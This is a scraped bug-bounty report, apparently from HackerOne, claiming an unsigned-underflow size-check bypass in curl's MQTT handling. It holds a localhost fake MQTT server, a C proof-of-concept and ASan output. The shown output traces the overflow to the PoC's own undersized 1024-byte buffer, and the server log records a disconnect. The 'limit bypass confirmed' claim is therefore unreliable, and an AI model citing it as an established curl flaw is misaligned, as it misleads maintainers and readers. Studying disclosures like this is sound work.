{“lastseen”:”2026-01-13T12:27:57″,”description”:”## Summary:\\nA logic error involving an integer overflow (specifically, an unsigned integer underflow) exists in the lib\/mqtt.c file within the mqtt_publish function. This vulnerability allows an attacker (or a malicious user configuration) to bypass the explicit MAX_MQTT_MESSAGE_SIZE check.\\n\\nThe vulnerability occurs when curl calculates whether an MQTT packet exceeds the maximum allowed size ( 0xFFFFFFF or ~268 MB). The validation logic performs a subtraction operation using the payload length before verifying if the payload is already too large. If the payload length exceeds the maximum size, the subtraction wraps around (underflows) to a large positive value, causing the safety check to pass incorrectly.\\n\\nThis leads to curl attempting to allocate a massive amount of memory and sending a packet that violates the intended protocol constraints defined in the source code.\\n\\n\\n## Vulnerable code\\nhttps:\/\/github.com\/curl\/curl\/blob\/master\/lib\/mqtt.c#L533\\nhttps:\/\/github.com\/curl\/curl\/blob\/master\/lib\/mqtt.c#L563-L568\\n\\n## Affected version\\ncurrent (8.18.0)\\n\\n## Steps To Reproduce:\\nTo reproduce this issue, we need MQTT server to accept the connection and a C program using libcurl to send a payload larger than MAX_MQTT_MESSAGE_SIZE .\\n\\n1.MQTT Server ( mqtt_server.py )\\n“`\\nimport socket\\nimport struct\\nimport sys\\nimport time\\n\\ndef run_server():\\n host = ‘127.0.0.1’\\n port = 1883\\n \\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\\n sock.bind((host, port))\\n sock.listen(1)\\n \\n print(f\\”Listening on {host}:{port}\\”)\\n sys.stdout.flush()\\n \\n conn, addr = sock.accept()\\n print(f\\”Connection from {addr}\\”)\\n sys.stdout.flush()\\n \\n try:\\n # Read CONNECT packet\\n # Just read some bytes\\n data = conn.recv(1024)\\n print(f\\”Received CONNECT: {len(data)} bytes\\”)\\n sys.stdout.flush()\\n \\n # Send CONNACK\\n # Fixed header: 0x20, Remaining Length: 0x02\\n # Variable header: Connect Acknowledge Flags: 0x00, Connect Return Code: 0x00 (Accepted)\\n connack = b’\\\\x20\\\\x02\\\\x00\\\\x00’\\n conn.sendall(connack)\\n print(\\”Sent CONNACK\\”)\\n sys.stdout.flush()\\n \\n # Now expect PUBLISH\\n # Read the first few bytes to see the length\\n head = conn.recv(5)\\n if not head:\\n print(\\”Client disconnected immediately\\”)\\n return\\n\\n print(f\\”Received head: {head.hex()}\\”)\\n sys.stdout.flush()\\n \\n # We expect a huge packet if the vulnerability works\\n \\n received = len(head)\\n start_time = time.time()\\n \\n while True:\\n chunk = conn.recv(65536)\\n if not chunk:\\n break\\n received += len(chunk)\\n if time.time() – start_time \\u003e 1:\\n print(f\\”Received {received} bytes…\\”, end=’\\\\r’)\\n sys.stdout.flush()\\n start_time = time.time()\\n \\n print(f\\”\\\\nTotal received: {received} bytes\\”)\\n \\n except Exception as e:\\n print(f\\”Error: {e}\\”)\\n finally:\\n conn.close()\\n sock.close()\\n\\nif __name__ == ‘__main__’:\\n run_server()\\n“`\\n2. Exploit Code\\n“`\\n#include \\u003cstdio.h\\u003e\\n#include \\u003cstdlib.h\\u003e\\n#include \\u003cstring.h\\u003e\\n#include \\u003ccurl\/curl.h\\u003e\\n\\nint main(void)\\n{\\n CURL *curl;\\n CURLcode res;\\n\\n \\n setenv(\\”ASAN_OPTIONS\\”, \\”detect_leaks=0\\”, 1);\\n\\n curl_global_init(CURL_GLOBAL_ALL);\\n curl = curl_easy_init();\\n if(curl) {\\n curl_easy_setopt(curl, CURLOPT_URL, \\”mqtt:\/\/127.0.0.1:1883\/topic\\”);\\n curl_easy_setopt(curl, CURLOPT_POST, 1L);\\n\\n \/* use payload bigger than MAX_MQTT_MESSAGE_SIZE (~268MB) *\/\\n const curl_off_t huge_size = (curl_off_t)300 * 1024 * 1024;\\n curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE_LARGE, huge_size);\\n\\n \\n char *buf = (char *)calloc(1, 1024);\\n if(!buf) {\\n fprintf(stderr, \\”Failed to allocate small buffer\\\\n\\”);\\n return 1;\\n }\\n memset(buf, ‘A’, 1024);\\n curl_easy_setopt(curl, CURLOPT_POSTFIELDS, buf);\\n\\n curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L);\\n\\n printf(\\”ASAN PoC: attempting to send %lld bytes to MQTT…\\\\n\\”,\\n (long long)huge_size);\\n res = curl_easy_perform(curl);\\n\\n if(res == CURLE_OK) {\\n printf(\\”[ASAN] Transfer succeeded -\\u003e limit bypass confirmed.\\\\n\\”);\\n }\\n else if (res == CURLE_TOO_LARGE || res == CURLE_FILESIZE_EXCEEDED) {\\n printf(\\”[ASAN] Transfer blocked by size limit.\\\\n\\”);\\n }\\n else {\\n printf(\\”[ASAN] Transfer failed: %d (%s)\\\\n\\”, res, curl_easy_strerror(res));\\n }\\n\\n free(buf);\\n curl_easy_cleanup(curl);\\n }\\n curl_global_cleanup();\\n return 0;\\n}\\n“`\\n\\n## Ouput\\n1. MQTT Server ( mqtt_server.py )\\n“`\\nListening on 127.0.0.1:1883\\nConnection from (‘127.0.0.1’, 51950)\\nReceived CONNECT: 26 bytes\\nSent CONNACK\\nClient disconnected immediately\\n“`\\n2. POC ouput\\n“`\\nASAN PoC: attempting to send 314572800 bytes to MQTT…\\n* Trying 127.0.0.1:1883…\\n* Connected to 127.0.0.1 (127.0.0.1) port 1883\\n* Using client id ‘curlzeT6w484’\\n\\u003e MQTT\\u003c\\n curlzeT6w484* mqtt_doing: state [0]\\n* mqtt_doing: state [0]\\n\\u003c \\u003c * mqtt_doing: state [2]\\n\\u003c =================================================================\\n==10341==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000002780 at pc 0x000105765c88 bp 0x00016aff1710 sp 0x00016aff0eb0\\nREAD of size 314572800 at 0x619000002780 thread T0\\n #0 0x000105765c84 in memcpy+0x284 (libclang_rt.asan_osx_dynamic.dylib:arm64e+0x85c84)\\n #1 0x00019afb4d58 in mqtt_publish+0x130 (libcurl.4.dylib:arm64e+0x38d58)\\n #2 0x00019afb4674 in mqtt_doing+0x154 (libcurl.4.dylib:arm64e+0x38674)\\n #3 0x00019afb71c4 in multi_runsingle+0x258 (libcurl.4.dylib:arm64e+0x3b1c4)\\n #4 0x00019afb6ebc in curl_multi_perform+0xc8 (libcurl.4.dylib:arm64e+0x3aebc)\\n #5 0x00019af911b8 in curl_easy_perform+0x10c (libcurl.4.dylib:arm64e+0x151b8)\\n #6 0x000104e0c990 in main poc_asan.c:42\\n #7 0x000181126b94 (\\u003cunknown module\\u003e)\\n\\n0x619000002780 is located 0 bytes after 1024-byte region [0x619000002380,0x619000002780)\\nallocated by thread T0 here:\\n #0 0x00010571d620 in calloc+0x80 (libclang_rt.asan_osx_dynamic.dylib:arm64e+0x3d620)\\n #1 0x000104e0c8d4 in main poc_asan.c:30\\n #2 0x000181126b94 (\\u003cunknown module\\u003e)\\n\\nSUMMARY: AddressSanitizer: heap-buffer-overflow (libcurl.4.dylib:arm64e+0x38d58) in mqtt_publish+0x130\\nShadow bytes around the buggy address:\\n 0x619000002500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\\n 0x619000002580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\\n 0x619000002600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\\n 0x619000002680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\\n 0x619000002700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\\n=\\u003e0x619000002780:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\\n 0x619000002800: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\\n 0x619000002880: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\\n 0x619000002900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\\n 0x619000002980: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\\n 0x619000002a00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\\nShadow byte legend (one shadow byte represents 8 application bytes):\\n Addressable: 00\\n Partially addressable: 01 02 03 04 05 06 07 \\n Heap left redzone: fa\\n Freed heap region: fd\\n Stack left redzone: f1\\n Stack mid redzone: f2\\n Stack right redzone: f3\\n Stack after return: f5\\n Stack use after scope: f8\\n Global redzone: f9\\n Global init order: f6\\n Poisoned by user: f7\\n Container overflow: fc\\n Array cookie: ac\\n Intra object redzone: bb\\n ASan internal: fe\\n Left alloca redzone: ca\\n Right alloca redzone: cb\\n==10341==ABORTING\\n\\n## Impact\\n\\n1. Applications using libcurl MQTT can crash or abort if they set CURLOPT_POSTFIELDSIZE_LARGE to a very large value but provide a small CURLOPT_POSTFIELDS buffer, ASAN confirms an out-of-bounds read.\\n2. Failing to enforce size limits via a correct comparison allows attackers or misconfigurations to force libcurl to process oversized payloads. The flawed check is a classic unsigned wraparound (CWE-190).”,”published”:”2026-01-13T07:12:57″,”modified”:”2026-01-13T12:23:44″,”type”:”hackerone”,”title”:”curl: integer Overflow in MQTT Protocol Handling Allows Bypassing Message Size Limit”,”source”:””,”references”:””,”id”:”H1:3508500″,”bulletinFamily”:”bugbounty”,”cwe”:null,”cvelist”:[],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/hackerone.com\/reports\/3508500″,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-13T12:27:57″,”description”:”## Summary:\\nA logic error involving an integer overflow (specifically, an unsigned integer underflow) exists in the lib\/mqtt.c file within the mqtt_publish function. This vulnerability allows…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,117,13,33,7,11,5],"class_list":["post-35250","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-hackerone","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n